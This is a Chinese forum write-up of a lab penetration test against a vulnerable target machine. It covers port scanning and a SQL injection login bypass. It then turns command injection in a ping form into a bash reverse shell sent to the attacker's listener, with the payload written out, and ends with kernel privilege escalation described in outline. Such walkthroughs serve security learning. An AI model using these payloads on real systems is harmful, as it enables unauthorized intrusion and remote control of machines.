确定攻击靶机
- 老样子先确定攻击靶机,多了个数据库服务
- 攻击机:192.168.38.128
- 靶机:192.168.38.131
信息搜集
web服务80/443
页面信息
- 为一个登录页面,尝试使用SQL注入1'or'1'='1就进去了存在Sql注入。不过页面目前没发现什么东西。
- 目录扫描到一个路径访问似乎是一个文档
- 文档路径,不同语言内容类似,就是语言不一样
- 获取网站指纹信息
- nmap获取服务版本信息获取。
数据库服务|3306
远程连接服务|22
IPP(CUPS)|631
- 可以通过web页面打开,不过没有任何东西就知道一个版本号码。属于网络打印服务
整理信息
- 操作系统:Red Hat Linux
- 内核版本:Linux 2.4.9
端口服务版本信息备注22/tcpsshOpenSSH 3.9p1 (protocol 1.99)交换方式需要添加80/tcphttpApache httpd 2.0.52 (CentOS) PHP4.3.9存在SQL注入111/tcprpcbind2 (RPC #100000)443/tcpssl/httpApache httpd 2.0.52 (CentOS) PHP4.3.9存在SQL注入631/tcpippCUPS 1.1打印服务3306/tcpmysqlMySQL (unauthorized)无法远程连接搜索攻击点
历史漏洞POC
SSH | 3.9p1
- 有一个命令执行但是缺少相关服务,只有用户枚举服务。
Web| 80,443
CUPS|631
- 除开第一个文件上传的,还有几个拒绝服务和本地提权可以使用
测试攻击
Web服务
- 前段有个SQL注入回去看看吃了不细看的亏,没注意到他源代码错误的
- 根据他表单提交的路径为pingit.php,传参为POST传参,传参点为submit表单按钮(必须),ip
- 为什么必须要submit看HTML的类型为提交按钮,在前段需要按了提交按钮表单的内容才能被提交上去,所有是要必须带上的!!!,enctype为提交类型选择表单提交。
- 可以ping那么就可能会存在REC远程代码执行
- 大概确定了目标机器上没有nc命令,只能通过bash将shell弹到攻击机上面
- #传参,&要经过Url编码变成%26,多个参数之间用的不要进行编码,如果不行就修复表单提交
- ip=127.0.0.1%26/bin/bash -i >%26 /dev/tcp/192.168.38.128/8888 0>&1&submit=submit
- #监听本地端口
- nc -lvvp 8888
正常显示表单方法
- 刷新登录后的页面,使用Burp Suite抓取请求包,右键拦截响应包后forward
- 将响应包的那个多的点删掉后关掉拦截就可以了
提权
- 可以看到当前的用户为apache用户,需要对当前用户权限进行提升,想了想之前看到的CUPS的提权漏洞可以试试
- 不支持,缺少相关的环境架构(x86)不符合。
信息搜集
- 查看系统的版本和内核确定有没有相关的漏洞
- 查找相关版本漏洞
- 查看版本和内核都符合要求
- 传到靶机上面
- 编译执行
来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作! |
提升卡
置顶卡
沉默卡
喧嚣卡
变色卡
千斤顶
照妖镜
